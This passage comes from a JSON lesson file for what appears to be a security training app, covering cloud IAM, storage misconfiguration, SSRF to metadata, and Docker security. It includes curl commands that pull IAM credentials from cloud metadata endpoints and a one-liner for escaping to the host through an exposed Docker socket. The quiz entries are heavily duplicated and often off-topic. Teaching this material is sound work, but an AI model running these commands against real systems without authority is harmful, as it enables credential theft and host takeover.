controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"azure-ad-intro","cat":"Cloud & Container","title":"Azure AD (Entra ID) Intro","diff":1,"xp":75,"intro":"Identity backbone of Microsoft cloud.","sections":[{"type":"text","content":"Manages identities for Azure, M365, and SaaS apps."},{"type":"code","lang":"bash","content":"az login\naz ad user list\naz role assignment list"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Azure AD is now called?","opts":["Azure Identity","Microsoft Entra ID","Azure IAM","Microsoft Identity"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"azure-blob-storage","cat":"Cloud & Container","title":"Azure Blob Storage Misconfig","diff":1,"xp":75,"intro":"Public containers leak data.","sections":[{"type":"text","content":"Azure Blob containers with public access allow anonymous download."},{"type":"code","lang":"bash","content":"curl 'https://account.blob.core.windows.net/container?restype=container&comp=list'"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"What makes Azure Blob public?","opts":["No encryption","Public access level set","No RBAC","Anonymous auth"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"gcp-iam","cat":"Cloud & Container","title":"GCP IAM","diff":1,"xp":75,"intro":"Users, service accounts, roles.","sections":[{"type":"text","content":"Owner/Editor/Viewer primitives. Over-permissive service accounts are the risk."},{"type":"code","lang":"bash","content":"gcloud projects get-iam-policy PROJECT_ID\ngcloud iam service-accounts list"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"GCP's three primitive roles?","opts":["Admin/User/Guest","Owner/Editor/Viewer","Read/Write/Execute","Super/Standard/Basic"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"gcp-bucket-misconfig","cat":"Cloud & Container","title":"GCP Bucket Misconfiguration","diff":1,"xp":75,"intro":"allUsers = anyone on the internet.","sections":[{"type":"text","content":"allUsers or allAuthenticatedUsers roles allow public access."},{"type":"code","lang":"bash","content":"gsutil ls gs://bucket-name\ncurl 'https://storage.googleapis.com/bucket-name'"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"allUsers means?","opts":["Project members","Org users","Anyone on internet, no auth","GCP employees"],"ans":2},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"ssrf-cloud-metadata","cat":"Cloud & Container","title":"SSRF to Cloud Metadata","diff":2,"xp":200,"intro":"One SSRF = own the IAM role. All clouds.","sections":[{"type":"text","content":"AWS: 169.254.169.254, Azure: same + header, GCP: metadata.google.internal."},{"type":"code","lang":"bash","content":"# AWS\ncurl http://169.254.169.254/latest/meta-data/\n# Azure\ncurl -H 'Metadata:true' 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01'\n# GCP\ncurl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/'"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"AWS mitigation for metadata SSRF?","opts":["Security groups","IMDSv2","VPC","WAF"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"container-basics","cat":"Cloud & Container","title":"Container Security Basics","diff":1,"xp":50,"intro":"Containers share the host kernel.","sections":[{"type":"text","content":"Namespaces and cgroups isolate, but kernel is shared. Kernel vuln = host compromise."},{"type":"code","lang":"bash","content":"trivy image nginx:latest\ndocker run --read-only --no-new-privileges --cap-drop ALL myapp"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Containers share with host?","opts":["Nothing","The kernel","Filesystem","User accounts"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"docker-security","cat":"Cloud & Container","title":"Docker Security","diff":1,"xp":75,"intro":"Easy deployment, easy misconfiguration.","sections":[{"type":"text","content":"Exposed socket, privileged containers, secrets in layers, unpatched images."},{"type":"code","lang":"bash","content":"docker run -v /:/mnt --rm -it alpine chroot /mnt sh  # if socket exposed"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Exposed Docker socket is dangerous because?","opts":["Slows containers","Socket access = mount host filesystem","Disables networking","Exposes logs"],"ans":1},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"dockerfile-hardening","cat":"Cloud & Container","title":"Dockerfile Hardening","diff":1,"xp":75,"intro":"Secure images from the start.","sections":[{"type":"text","content":"Minimal base, non-root USER, multi-stage builds, no secrets in layers."},{"type":"code","lang":"dockerfile","content":"FROM node:20-alpine\nRUN adduser -S app\nUSER app\nCMD [\"node\",\"index.js\"]"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Why multi-stage builds?","opts":["Faster","Final image has only production artifacts","Better logging","Required by K8s"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted 